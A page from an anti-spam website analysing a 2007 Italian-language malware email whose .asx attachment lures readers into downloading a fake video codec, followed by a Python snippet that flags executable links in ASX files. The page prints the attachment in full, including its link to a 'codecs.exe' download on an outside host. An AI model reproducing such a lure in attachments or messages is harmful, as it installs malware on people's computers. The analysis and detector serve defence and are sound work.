Joe Wein
Fighting spam and scams
on the Internet


Trojans targeting Brazilians

The following Italian-language email aims to install a piece of malware on your computer. If you click on its attachment (filmato.asx), you will be asked whether you want to install a driver for the video format. If you accept, Windows will download malware from another server and turn your computer into a remote-controlled zombie.

Example:

Received: from tiscali.it (AMontpellier-152-1-48-154.w81-251.abo.wanadoo.fr
 [81.251.190.154]) by cobalt.pobox.com (Postfix) with SMTP id 18C604000A3 for
 <joewein@pobox.com>; Sun, 11 Feb 2007 06:36:16 -0500 (EST)
Message-ID: <20070211114345500.SXyzbq6fdq3KSCqfaaWO@cobalt.pobox.com>
From: "lainello@tiscali.it" <lainello@tiscali.it>
To: "joewein@pobox.com" <joewein@pobox.com>
Subject: Compleanno
Date: Sun, 11 Feb 2007 12:43:45 +0100

Il video del mio compleanno,
indovina chi e' la persona che mi sta a fianco? 


Ciao...

Here is the actual content of the attachment:

<ASX version="3.0">
	<ENTRY>
		<TITLE>Impossibile Trovare il Codec</TITLE>
		<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
		<DURATION VALUE="60:00"/>
		<BANNER HREF ="http://updatecodecs.t35.com/img.gif">
			<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
			<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
		</BANNER>
	</ENTRY>
</ASX>

Other versions of this malware spam load other executables using different names; this is just one example.
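
Because the file names vary between versions, a mail filter does better to check where the links inside an .asx attachment point than to match one name. The following is an added example, not code from this page or from jwSpamSpy; the function name scan_asx and the extension list are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import posixpath

# Assumed extension list (not from the page); adjust to local policy.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi"}

class AsxLinkCollector(HTMLParser):
    # HTMLParser rather than an XML parser: ASX tag and attribute names are
    # case-insensitive and real files are often not well-formed XML.
    def __init__(self):
        super().__init__()
        self.links = []  # (tag, url) pairs, names lower-cased by the parser

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                self.links.append((tag, value.strip()))

def scan_asx(text):
    """Return one finding per HREF whose URL path ends in an executable extension."""
    collector = AsxLinkCollector()
    collector.feed(text)
    collector.close()
    findings = []
    for tag, url in collector.links:
        ext = posixpath.splitext(urlsplit(url).path)[1].lower()
        if ext in EXECUTABLE_EXTS:
            findings.append({"tag": tag, "url": url, "ext": ext})
    return findings

# The attachment quoted above, embedded so the example runs offline.
SAMPLE_ASX = """<ASX version="3.0">
  <ENTRY>
    <TITLE>Impossibile Trovare il Codec</TITLE>
    <REF HREF ="http://updatecodecs.t35.com/video.avi"/>
    <DURATION VALUE="60:00"/>
    <BANNER HREF ="http://updatecodecs.t35.com/img.gif">
      <ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
      <MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
    </BANNER>
  </ENTRY>
</ASX>"""

if __name__ == "__main__":
    for f in scan_asx(SAMPLE_ASX):
        print(f"suspicious <{f['tag']}> link to {f['ext']} file: {f['url']}")
```

On the sample above only the MOREINFO link is reported; the .avi and .gif references are not.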